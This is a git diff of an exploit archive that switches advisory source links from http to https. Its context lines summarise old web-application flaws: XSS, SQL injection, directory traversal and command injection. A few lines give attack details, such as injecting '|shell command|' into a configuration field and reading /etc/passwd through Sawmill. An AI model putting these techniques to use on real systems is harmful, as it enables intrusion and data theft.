b/exploits/cfm/webapps/26767.txt index 16bb3307e..e04b922f0 100644 --- a/exploits/cfm/webapps/26767.txt +++ b/exploits/cfm/webapps/26767.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15778/info +source: https://www.securityfocus.com/bid/15778/info CF_Nuke is prone to multiple cross-site scripting vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/cfm/webapps/26772.txt b/exploits/cfm/webapps/26772.txt index 9b55761e7..9b29747ec 100644 --- a/exploits/cfm/webapps/26772.txt +++ b/exploits/cfm/webapps/26772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15805/info +source: https://www.securityfocus.com/bid/15805/info Magic Book Professional is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26882.txt b/exploits/cfm/webapps/26882.txt index fd37e6008..f1fa7232a 100644 --- a/exploits/cfm/webapps/26882.txt +++ b/exploits/cfm/webapps/26882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15948/info +source: https://www.securityfocus.com/bid/15948/info Web Content Management Suite is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26909.txt b/exploits/cfm/webapps/26909.txt index 32f3f79d3..1a81a00d2 100644 --- a/exploits/cfm/webapps/26909.txt +++ b/exploits/cfm/webapps/26909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15963/info +source: https://www.securityfocus.com/bid/15963/info Community Enterprise is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26910.txt b/exploits/cfm/webapps/26910.txt index 0be43fa95..f5e0807ee 100644 --- a/exploits/cfm/webapps/26910.txt +++ b/exploits/cfm/webapps/26910.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15964/info +source: https://www.securityfocus.com/bid/15964/info E-Publish is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26920.txt b/exploits/cfm/webapps/26920.txt index b00ae7479..19e07b994 100644 --- a/exploits/cfm/webapps/26920.txt +++ b/exploits/cfm/webapps/26920.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15995/info +source: https://www.securityfocus.com/bid/15995/info HoneyComb Archive is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/26986.txt b/exploits/cfm/webapps/26986.txt index 1a5e0aa86..4c3b07817 100644 --- a/exploits/cfm/webapps/26986.txt +++ b/exploits/cfm/webapps/26986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16071/info +source: https://www.securityfocus.com/bid/16071/info PaperThin CommonSpot Content Server is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/27455.txt b/exploits/cfm/webapps/27455.txt index e80b6bc50..593a06edc 100644 --- a/exploits/cfm/webapps/27455.txt +++ b/exploits/cfm/webapps/27455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17193/info +source: https://www.securityfocus.com/bid/17193/info 1WebCalendar is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/cfm/webapps/27456.txt b/exploits/cfm/webapps/27456.txt index 82679e21d..9761c56c7 100644 --- a/exploits/cfm/webapps/27456.txt +++ b/exploits/cfm/webapps/27456.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17193/info +source: https://www.securityfocus.com/bid/17193/info 1WebCalendar is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/cfm/webapps/27457.txt b/exploits/cfm/webapps/27457.txt index 0528197c9..9315cbffd 100644 --- a/exploits/cfm/webapps/27457.txt +++ b/exploits/cfm/webapps/27457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17193/info +source: https://www.securityfocus.com/bid/17193/info 1WebCalendar is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/cfm/webapps/27489.txt b/exploits/cfm/webapps/27489.txt index 5fa8833bf..905c4fb3b 100644 --- a/exploits/cfm/webapps/27489.txt +++ b/exploits/cfm/webapps/27489.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17272/info +source: https://www.securityfocus.com/bid/17272/info The couponZONE application is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/27490.txt b/exploits/cfm/webapps/27490.txt index ee0eb27b9..7742ec70c 100644 --- a/exploits/cfm/webapps/27490.txt +++ b/exploits/cfm/webapps/27490.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17273/info +source: https://www.securityfocus.com/bid/17273/info The classifiedZONE script is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/27491.txt b/exploits/cfm/webapps/27491.txt index ad665a970..2b16aa784 100644 --- a/exploits/cfm/webapps/27491.txt +++ b/exploits/cfm/webapps/27491.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17274/info +source: https://www.securityfocus.com/bid/17274/info The couponZONE application is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/cfm/webapps/27493.txt b/exploits/cfm/webapps/27493.txt index eda100aa1..bc390b8e8 100644 --- a/exploits/cfm/webapps/27493.txt +++ b/exploits/cfm/webapps/27493.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17277/info +source: https://www.securityfocus.com/bid/17277/info The realestateZONE script is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/27853.txt b/exploits/cfm/webapps/27853.txt index a0a4b6ce8..46c4d1fe6 100644 --- a/exploits/cfm/webapps/27853.txt +++ b/exploits/cfm/webapps/27853.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17941/info +source: https://www.securityfocus.com/bid/17941/info Cartweaver ColdFusion is prone to SQL-injection vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/cfm/webapps/29334.txt b/exploits/cfm/webapps/29334.txt index 4b2692846..a0acdfc10 100644 --- a/exploits/cfm/webapps/29334.txt +++ b/exploits/cfm/webapps/29334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21727/info +source: https://www.securityfocus.com/bid/21727/info Future Internet is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cfm/webapps/29335.txt b/exploits/cfm/webapps/29335.txt index 4708634c3..12dafd2cd 100644 --- a/exploits/cfm/webapps/29335.txt +++ b/exploits/cfm/webapps/29335.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21727/info +source: https://www.securityfocus.com/bid/21727/info Future Internet is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cfm/webapps/29567.txt b/exploits/cfm/webapps/29567.txt index aeb74dceb..378ccb16e 100644 --- a/exploits/cfm/webapps/29567.txt +++ b/exploits/cfm/webapps/29567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22401/info +source: https://www.securityfocus.com/bid/22401/info Adobe ColdFusion is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cfm/webapps/30202.txt b/exploits/cfm/webapps/30202.txt index e55f385a7..92e36bc6c 100644 --- a/exploits/cfm/webapps/30202.txt +++ b/exploits/cfm/webapps/30202.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24528/info +source: https://www.securityfocus.com/bid/24528/info FuseTalk is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/cfm/webapps/30206.txt b/exploits/cfm/webapps/30206.txt index 45e7619de..6f2757c67 100644 --- a/exploits/cfm/webapps/30206.txt +++ b/exploits/cfm/webapps/30206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24563/info +source: https://www.securityfocus.com/bid/24563/info FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cfm/webapps/30216.txt b/exploits/cfm/webapps/30216.txt index e4c370398..a53b78d13 100644 --- a/exploits/cfm/webapps/30216.txt +++ b/exploits/cfm/webapps/30216.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24564/info +source: https://www.securityfocus.com/bid/24564/info FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cfm/webapps/33167.txt b/exploits/cfm/webapps/33167.txt index 136b27161..6014e884a 100644 --- a/exploits/cfm/webapps/33167.txt +++ b/exploits/cfm/webapps/33167.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36046/info +source: https://www.securityfocus.com/bid/36046/info Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cfm/webapps/33168.txt b/exploits/cfm/webapps/33168.txt index d3b85ef83..ff93e2882 100644 --- a/exploits/cfm/webapps/33168.txt +++ b/exploits/cfm/webapps/33168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36046/info +source: https://www.securityfocus.com/bid/36046/info Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cfm/webapps/33169.txt b/exploits/cfm/webapps/33169.txt index 3125abaa7..67f40e978 100644 --- a/exploits/cfm/webapps/33169.txt +++ b/exploits/cfm/webapps/33169.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36046/info +source: https://www.securityfocus.com/bid/36046/info Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cfm/webapps/33170.txt b/exploits/cfm/webapps/33170.txt index 56cc1efe2..19d56b42e 100644 --- a/exploits/cfm/webapps/33170.txt +++ b/exploits/cfm/webapps/33170.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36046/info +source: https://www.securityfocus.com/bid/36046/info Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cfm/webapps/33575.txt b/exploits/cfm/webapps/33575.txt index 9ee8ba273..158df32db 100644 --- a/exploits/cfm/webapps/33575.txt +++ b/exploits/cfm/webapps/33575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37986/info +source: https://www.securityfocus.com/bid/37986/info CommonSpot Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/33916.txt b/exploits/cfm/webapps/33916.txt index e1b9c76f9..92889c331 100644 --- a/exploits/cfm/webapps/33916.txt +++ b/exploits/cfm/webapps/33916.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39864/info +source: https://www.securityfocus.com/bid/39864/info Mango Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/33948.txt b/exploits/cfm/webapps/33948.txt index 13327b9cc..3e5f77d91 100644 --- a/exploits/cfm/webapps/33948.txt +++ b/exploits/cfm/webapps/33948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39973/info +source: https://www.securityfocus.com/bid/39973/info Site Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/cfm/webapps/35107.txt b/exploits/cfm/webapps/35107.txt index 3caa82121..e263bb6f2 100644 --- a/exploits/cfm/webapps/35107.txt +++ b/exploits/cfm/webapps/35107.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45384/info +source: https://www.securityfocus.com/bid/45384/info Mura CMS is prone to multiple cross-site-scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cfm/webapps/35256.txt b/exploits/cfm/webapps/35256.txt index 067260fa5..dd1ddaa83 100644 --- a/exploits/cfm/webapps/35256.txt +++ b/exploits/cfm/webapps/35256.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45985/info +source: https://www.securityfocus.com/bid/45985/info ActiveWeb Professional is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/cfm/webapps/36067.txt b/exploits/cfm/webapps/36067.txt index 00b6b21dc..5ee85329a 100644 --- a/exploits/cfm/webapps/36067.txt +++ b/exploits/cfm/webapps/36067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49220/info +source: https://www.securityfocus.com/bid/49220/info Adobe ColdFusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/36172.txt b/exploits/cfm/webapps/36172.txt index 472b2fc26..8a848e7c3 100644 --- a/exploits/cfm/webapps/36172.txt +++ b/exploits/cfm/webapps/36172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49787/info +source: https://www.securityfocus.com/bid/49787/info Adobe ColdFusion is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/dos/19899.txt b/exploits/cgi/dos/19899.txt index 157485f4b..3dc149746 100644 --- a/exploits/cgi/dos/19899.txt +++ b/exploits/cgi/dos/19899.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1175/info +source: https://www.securityfocus.com/bid/1175/info UltraBoard 1.6 (and possibly all 1.x versions and the new beta Ultraboard 2000) are vulnerable to this Denial of Service attack. diff --git a/exploits/cgi/dos/20071.c b/exploits/cgi/dos/20071.c index 84119a776..9d7ef4b31 100644 --- a/exploits/cgi/dos/20071.c +++ b/exploits/cgi/dos/20071.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1463/info +// source: https://www.securityfocus.com/bid/1463/info The guestbook CGI program in ICQ Web Front service for ICQ 2000a, 99b, and others allows remote attackers to cause a denial of service via a URL with a long name parameter. diff --git a/exploits/cgi/dos/20400.txt b/exploits/cgi/dos/20400.txt index 68dad4a40..98966c421 100644 --- a/exploits/cgi/dos/20400.txt +++ b/exploits/cgi/dos/20400.txt @@ -1,4 +1,4 @@ -source : http://www.securityfocus.com/bid/1934/info +source : https://www.securityfocus.com/bid/1934/info Cart32 is a shopping cart application for e-commerce enabled sites. diff --git a/exploits/cgi/dos/20753.txt b/exploits/cgi/dos/20753.txt index 91a04948b..ff0aa698b 100644 --- a/exploits/cgi/dos/20753.txt +++ b/exploits/cgi/dos/20753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2588/info +source: https://www.securityfocus.com/bid/2588/info Net.Commerce is part of the Websphere platform of products distributed by IBM. Net.Commerce provides several versatile features to facilitate e-commerce, and features in performance and reliability. diff --git a/exploits/cgi/dos/21048.txt b/exploits/cgi/dos/21048.txt index 723219fc0..26d733b02 100644 --- a/exploits/cgi/dos/21048.txt +++ b/exploits/cgi/dos/21048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3155/info +source: https://www.securityfocus.com/bid/3155/info responder.cgi' is a free CGI shell script, written in C, for MacHTTP Server and other MacOS webserver products. 
diff --git a/exploits/cgi/dos/21620.txt b/exploits/cgi/dos/21620.txt index 78b25648b..59e6f5a47 100644 --- a/exploits/cgi/dos/21620.txt +++ b/exploits/cgi/dos/21620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5248/info +source: https://www.securityfocus.com/bid/5248/info A vulnerability has been reported for Oddsock Song Requester 2.1. diff --git a/exploits/cgi/dos/24619.txt b/exploits/cgi/dos/24619.txt index 74c84b7b1..e4591588c 100644 --- a/exploits/cgi/dos/24619.txt +++ b/exploits/cgi/dos/24619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11226/info +source: https://www.securityfocus.com/bid/11226/info Reportedly EmuLive Server4 is affected by an authentication bypass vulnerability and a denial of service vulnerability. These issues are due to an access validation issue and a failure to handle exceptional conditions. diff --git a/exploits/cgi/dos/39073.txt b/exploits/cgi/dos/39073.txt index 4c8def36e..44db546db 100644 --- a/exploits/cgi/dos/39073.txt +++ b/exploits/cgi/dos/39073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65306/info +source: https://www.securityfocus.com/bid/65306/info WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. diff --git a/exploits/cgi/local/20092.txt b/exploits/cgi/local/20092.txt index c52bb995f..f81aa501c 100644 --- a/exploits/cgi/local/20092.txt +++ b/exploits/cgi/local/20092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1494/info +source: https://www.securityfocus.com/bid/1494/info A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine. diff --git a/exploits/cgi/remote/19713.pl b/exploits/cgi/remote/19713.pl index bf0438fd5..421677be5 100755 --- a/exploits/cgi/remote/19713.pl +++ b/exploits/cgi/remote/19713.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/921/info +source: https://www.securityfocus.com/bid/921/info Home Free is a suite of Perl cgi scripts that allow a website to support user contributions of various types. One of the scripts, search.cgi, accepts a parameter called letter which can be any text string. The supplied argument can contain the '../' string, which the script will process. This can be used to obtain directory listings and the first line of files outside of the intended web filesystem. diff --git a/exploits/cgi/remote/19741.pl b/exploits/cgi/remote/19741.pl index 8b0907c6c..7f499a517 100755 --- a/exploits/cgi/remote/19741.pl +++ b/exploits/cgi/remote/19741.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/967/info +source: https://www.securityfocus.com/bid/967/info WWWThreads is a web bulletin board program that uses an SQL backend. Due to incomplete input validation, it is possible for an attacker to submit SQL commands through forms and manipulate the contents of the database to gain administrator privileges over the database. diff --git a/exploits/cgi/remote/19745.txt b/exploits/cgi/remote/19745.txt index b21674bd2..7d88ac8d9 100644 --- a/exploits/cgi/remote/19745.txt +++ b/exploits/cgi/remote/19745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/974/info +source: https://www.securityfocus.com/bid/974/info 'The Finger Server' is a perl script for providing .plan-like functionality through a website. Due to insufficient input checking it is possible for remote unauthenticated users to execute shell commands on the server which will run with the priveleges of the webserver. diff --git a/exploits/cgi/remote/19747.txt b/exploits/cgi/remote/19747.txt index 7914cc3c0..faa2c6136 100644 --- a/exploits/cgi/remote/19747.txt +++ b/exploits/cgi/remote/19747.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/977/info +source: https://www.securityfocus.com/bid/977/info Appending "%00" to the end of a CGI script filename will permit a remote client to view full contents of the script if the CGI module option "allow CGIs anywhere" is enabled. Scripts located in directories which are designated as executable (eg. \cgi-bin) are not vulnerable to this exploit. diff --git a/exploits/cgi/remote/19786.txt b/exploits/cgi/remote/19786.txt index e3eda935e..8829207d6 100644 --- a/exploits/cgi/remote/19786.txt +++ b/exploits/cgi/remote/19786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1028/info +source: https://www.securityfocus.com/bid/1028/info A vulnerability exists in the 1.0.8 release of DNSTools (labeled on some areas of their site as 1.08), from DNSTools Software. By manipulating the contents of certain post variables, arbitrary code may be executed. diff --git a/exploits/cgi/remote/19795.txt b/exploits/cgi/remote/19795.txt index 9466d0b49..be50d7c49 100644 --- a/exploits/cgi/remote/19795.txt +++ b/exploits/cgi/remote/19795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1036/info +source: https://www.securityfocus.com/bid/1036/info A vulnerability exists in the default installation of Caldera OpenLinux 2.3. A CGI is installed in /home/httpd/cgi-bin/ names rpm_query. Any user can run this CGI and obtain a listing of the packages, and versions of packages, installed on this system. This could be used to determine vulnerabilities on the machine remotely. diff --git a/exploits/cgi/remote/19808.txt b/exploits/cgi/remote/19808.txt index 22e121f58..b62f9eb43 100644 --- a/exploits/cgi/remote/19808.txt +++ b/exploits/cgi/remote/19808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1052/info +source: https://www.securityfocus.com/bid/1052/info Any file that the webserver has read access to can be read on a server running the Sojourn search engine. 
diff --git a/exploits/cgi/remote/19842.txt b/exploits/cgi/remote/19842.txt index ead25b513..34e2a31a4 100644 --- a/exploits/cgi/remote/19842.txt +++ b/exploits/cgi/remote/19842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1102/info +source: https://www.securityfocus.com/bid/1102/info Web+ is an e-commerce server designed to run under a webserver, to provide web storefronts. The various scripts that are required to do this are specified to the webpsvr daemon via a 'script' variable passed to the webplus CGI. This CGI can be passed a path to any file via the script variable, resulting in arbitrary files being displayed to the browser. This vulnerability is limited to files that are known to the user and that the webpsvr daemon has read access to. diff --git a/exploits/cgi/remote/19844.txt b/exploits/cgi/remote/19844.txt index 7618eb6f6..59698b54d 100644 --- a/exploits/cgi/remote/19844.txt +++ b/exploits/cgi/remote/19844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1104/info +source: https://www.securityfocus.com/bid/1104/info BizDB is a web databse integration product using perl CGI scripts. One of the scripts, bizdb-search.cgi, passes a variable's contents to an unchecked open() call and can therefore be made to execute commands at the privilege level of the webserver. diff --git a/exploits/cgi/remote/19852.txt b/exploits/cgi/remote/19852.txt index cb3e191f1..45fbd9ea7 100644 --- a/exploits/cgi/remote/19852.txt +++ b/exploits/cgi/remote/19852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1115/info +source: https://www.securityfocus.com/bid/1115/info Appending specific variables and values to http://target/cgi-bin/cart.pl? will allow remote users to perform certain actions. "vars" will display the configuration settings of the application, which includes the username and password used for credit card transactions. Environmental settings can be obtained using "env'". 
diff --git a/exploits/cgi/remote/19890.txt b/exploits/cgi/remote/19890.txt index 71518a258..f6b246b84 100644 --- a/exploits/cgi/remote/19890.txt +++ b/exploits/cgi/remote/19890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1164/info +source: https://www.securityfocus.com/bid/1164/info UltraBoard 1.6 (and possibly all 1.x versions) is vulnerable to a directory traversal attack that will allow any remote browser to download any file that the webserver has read access to. On Windows instalations, the file must reside on the same logical drive as the webroot. In all cases, the filename and relative path from the webroot must be known to the attacker. diff --git a/exploits/cgi/remote/19909.pl b/exploits/cgi/remote/19909.pl index fcab92046..e5eb90a08 100755 --- a/exploits/cgi/remote/19909.pl +++ b/exploits/cgi/remote/19909.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1199/info +source: https://www.securityfocus.com/bid/1199/info Bugzilla is a web-based bug-tracking system based on Perl and MySQL. It allows people to submit bugs and catalogs them. diff --git a/exploits/cgi/remote/19913.txt b/exploits/cgi/remote/19913.txt index 8b642445a..991fb59c5 100644 --- a/exploits/cgi/remote/19913.txt +++ b/exploits/cgi/remote/19913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1202/info +source: https://www.securityfocus.com/bid/1202/info Due to unchecked code that handles user input in George Burgyan's CGI Counter, remote execution of arbitrary commands at the same privilege level as the web server it is running on is possible. diff --git a/exploits/cgi/remote/19921.txt b/exploits/cgi/remote/19921.txt index 052d22afa..f3b44a390 100644 --- a/exploits/cgi/remote/19921.txt +++ b/exploits/cgi/remote/19921.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1215/info +source: https://www.securityfocus.com/bid/1215/info Matt Kruse's Calendar script is a popular, free perl cgi-script used by many websites on the Internet. It allows a website administrator to easily setup and customize a calendar on their website. There are two components of this package, calendar-admin.pl and calendar.pl. Calendar-admin.pl calls open() with user-input in the command string but does not parse the input for metacharacters. It is therefor possible to execute arbitrary commands on the target host by passing "|shell command|" as one value of the "configuration file" field. The shell that is spawned with the open() call will then execute those commands with the uid of the webserver. This can result in remote access to the system for the attacker. Calendar.pl is vulnerable to a similar attack. diff --git a/exploits/cgi/remote/19951.php b/exploits/cgi/remote/19951.php index 7912bf476..fa42f4b54 100644 --- a/exploits/cgi/remote/19951.php +++ b/exploits/cgi/remote/19951.php @@ -1,6 +1,6 @@ E-Commerce Exchange QuickCommerce 2.5/3.0,McMurtrey/Whitaker & Associates Cart32 2.5 a/3.0,Shop Express 1.0,StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability -source: http://www.securityfocus.com/bid/1237/info* +source: https://www.securityfocus.com/bid/1237/info* Various shopping cart applications use hidden form fields within the html source code with preset parameters which contain product information. For example: price, weight, quantity, identification etc. If a remote user saves the web page of a particular item to their machine it is possible for them to edit the html source, consequently allowing them to alter the parameters of the product. The modified web page can then be submitted to the shopping cart application. It is also possible in some circumstances to exploit this vulnerability via any regular browser's address bar. 
diff --git a/exploits/cgi/remote/19956.txt b/exploits/cgi/remote/19956.txt index aec4b91a0..65f19e594 100644 --- a/exploits/cgi/remote/19956.txt +++ b/exploits/cgi/remote/19956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1243/info +source: https://www.securityfocus.com/bid/1243/info By default JetAdmin Web Interface Server listens on port 8000. By requesting a specially formed URL which includes "../" it is possible for a remote user to gain read-access to any files outside of the web-published directory. diff --git a/exploits/cgi/remote/19995.txt b/exploits/cgi/remote/19995.txt index db7a42f83..a52297fef 100644 --- a/exploits/cgi/remote/19995.txt +++ b/exploits/cgi/remote/19995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1313/info +source: https://www.securityfocus.com/bid/1313/info Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the source code of the script. diff --git a/exploits/cgi/remote/20007.c b/exploits/cgi/remote/20007.c index 3fc27b7f0..3c7e35fb3 100644 --- a/exploits/cgi/remote/20007.c +++ b/exploits/cgi/remote/20007.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1335/info +// source: https://www.securityfocus.com/bid/1335/info MailStudio 2000 is vulnerable to multiple attacks. diff --git a/exploits/cgi/remote/20008.txt b/exploits/cgi/remote/20008.txt index a260b32b7..6292b87d6 100644 --- a/exploits/cgi/remote/20008.txt +++ b/exploits/cgi/remote/20008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1335/info +source: https://www.securityfocus.com/bid/1335/info MailStudio 2000 is vulnerable to multiple attacks. diff --git a/exploits/cgi/remote/20041.txt b/exploits/cgi/remote/20041.txt index d5a158634..a203687a1 100644 --- a/exploits/cgi/remote/20041.txt +++ b/exploits/cgi/remote/20041.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1402/info +source: https://www.securityfocus.com/bid/1402/info Sawmill is a site statistics package for Unix, Windows and Mac OS. A specially crafted request can disclose the first line of any world readable file for which the full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".' diff --git a/exploits/cgi/remote/20059.txt b/exploits/cgi/remote/20059.txt index c29385864..afb82c12e 100644 --- a/exploits/cgi/remote/20059.txt +++ b/exploits/cgi/remote/20059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1431/info +source: https://www.securityfocus.com/bid/1431/info Poll It is a Perl CGI application used to create and maintain opinion polls on websites. The program relies on a number of internal variables. These variables can be overwritten by any remote user by specifying the new value as a variable in the GET request. This is due to the fact that Poll It overwrites variables to user-supplied values after it sets them to the internally-specified defaults. diff --git a/exploits/cgi/remote/20068.txt b/exploits/cgi/remote/20068.txt index eb7d99042..520b65094 100644 --- a/exploits/cgi/remote/20068.txt +++ b/exploits/cgi/remote/20068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1455/info +source: https://www.securityfocus.com/bid/1455/info Versions 1.4H and prior of BB4 Big Brother are susceptible to a directory traversal vulnerability which would allow a remote user to view the contents of any directory or file on the system. Executing a GET request for: diff --git a/exploits/cgi/remote/20085.txt b/exploits/cgi/remote/20085.txt index 78bfcc521..8ba81cf8a 100644 --- a/exploits/cgi/remote/20085.txt +++ b/exploits/cgi/remote/20085.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1485/info +source: https://www.securityfocus.com/bid/1485/info Alibaba Web Server fails to filter piped commands when executing cgi-scripts. This can be used to execute commands with the privileges of the web server process on a target machine. diff --git a/exploits/cgi/remote/20156.txt b/exploits/cgi/remote/20156.txt index 7027ac123..836dd9089 100644 --- a/exploits/cgi/remote/20156.txt +++ b/exploits/cgi/remote/20156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1587/info +source: https://www.securityfocus.com/bid/1587/info A remote user is capable of gaining read access to any known file residing on a host running Netwin Netauth through directory traversal. Appending a series of '../' and the desired file name to the 'page' variable at the end of a request to netauth.cgi will allow a remote user to walk the entire directory tree above the Netauth directory. diff --git a/exploits/cgi/remote/20164.pl b/exploits/cgi/remote/20164.pl index 27e8cb976..d5d513607 100755 --- a/exploits/cgi/remote/20164.pl +++ 